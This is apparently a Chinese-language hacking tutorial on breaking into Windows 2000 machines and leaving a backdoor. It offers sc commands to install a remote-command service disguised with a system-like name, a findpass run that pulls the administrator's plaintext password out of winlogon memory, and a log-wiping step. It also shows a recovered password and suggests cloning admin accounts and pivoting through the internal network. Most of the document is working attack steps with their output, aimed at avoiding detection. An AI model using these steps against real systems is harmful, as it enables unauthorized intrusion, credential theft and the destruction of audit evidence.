入侵Windows2000系统放置后门的方法
Msvcp60.dll vc的运行库,这个东西其实不是必须的,但为了防止在某些缺少Msvcp60.dll的机上在运行Clealog清除日志时对方的机上会突然弹出一个对话框说缺少Msvcp60.dll的尴尬情况,最好把它一起复制过去。
c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath= c:\winnt\system32\rcmdsvc.exe type= own start= auto
在这里我们用sc在目标机xxx.xxx.xxx.xxx上创建了一个名为Remote Command Service的服务,启动方式为自动。当然为了隐蔽,你最好把“Remote Command Service”这个服务名改成其它比较类似系统服务的名字,毕竟管理员不可能看着一个突然多出来的Remote Command而坐视不管,而且也显的你太嚣张了。
PS:sc.exe是Windows2000 Resource Kit中一个功能非常强大的对服务进行控制的工具,详细的使用方法可以参考本站的《SC使用完全指南》。
c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service" SERVICE_NAME: rpc support services TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE,NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 /*在这里我们用sc启动刚才创建的Remote Command Service服务。*/ /*下面连上对方服务器*/ c:\>rcmd Enter Server Name : xxx.xxx.xxx.xxx Connect to \\xxx.xxx.xxx.xxx Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\Documents and Settings\Default User.WINNT>pulist Process PID User Idle 0 System 8 smss.exe 168 NT AUTHORITY\SYSTEM csrss.exe 192 NT AUTHORITY\SYSTEM winlogon.exe 212 NT AUTHORITY\SYSTEM services.exe 240 NT AUTHORITY\SYSTEM lsass.exe 252 NT AUTHORITY\SYSTEM svchost.exe 408 NT AUTHORITY\SYSTEM spoolsv.exe 436 NT AUTHORITY\SYSTEM msdtc.exe 464 NT AUTHORITY\SYSTEM svchost.exe 596 NT AUTHORITY\SYSTEM llssrv.exe 624 NT AUTHORITY\SYSTEM regsvc.exe 676 NT AUTHORITY\SYSTEM rpcsvc.exe 692 NT AUTHORITY\SYSTEM mstask.exe 716 NT AUTHORITY\SYSTEM LSESS.EXE 792 NT AUTHORITY\SYSTEM tlntsvr.exe 832 NT AUTHORITY\SYSTEM VrUpSvr.exe 956 NT AUTHORITY\SYSTEM winmgmt.exe 968 NT AUTHORITY\SYSTEM dns.exe 980 NT AUTHORITY\SYSTEM dfssvc.exe 1064 NT AUTHORITY\SYSTEM POP3S.exe 1100 NT AUTHORITY\SYSTEM smtpds.exe 1120 NT AUTHORITY\SYSTEM svchost.exe 1384 NT AUTHORITY\SYSTEM dllhost.exe 1316 NT AUTHORITY\SYSTEM internat.exe 1308 SERVER\Administrator conime.exe 1680 SERVER\Administrator VRMONSVC.EXE 872 NT AUTHORITY\SYSTEM inetinfo.exe 1456 NT AUTHORITY\SYSTEM explorer.exe 1548 SERVER\Administrator cmd.exe 1712 SERVER\Guest pulist.exe 532 SERVER\Guest /*我们可以看到winlogon.exe的进程号是212*/ C:\Documents and Settings\Default User.WINNT>findpass server administrator 212 To Find Password in the Winlogon process Usage: fidp DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 214 (0x000000d6). To find server\administrator password in process 214 ... The encoded password is found at 0x01a00800 and has a length of 3. The logon information is: server/administrator/Tgrh87fd. The hash byte is: 0xb8. /*在winlogon中查找administrator的名文口令*/ C:\Documents and Settings\Default User.WINNT>clealog clealog done /*清除日志记录*/ C:\Documents and Settings\Default User.WINNT>
到这里我们已经看到Administrator的密码是Tgrh87fd。
至此我们拿到了管理员的密码并安放了一个Rcmdsvc的后门,当然你还可以接着做许多事。比如利用Adam发现的Bug再克隆一个管理员账号。或者用SC把对方的Tlntsvr服务启起来。不过后者比较容易被发现,不推荐。如果你对他的内网的某台机感兴趣而且该机也有漏洞,可以用Fpipe做端口重定向后为下一步的进攻做准备。
0
相关文章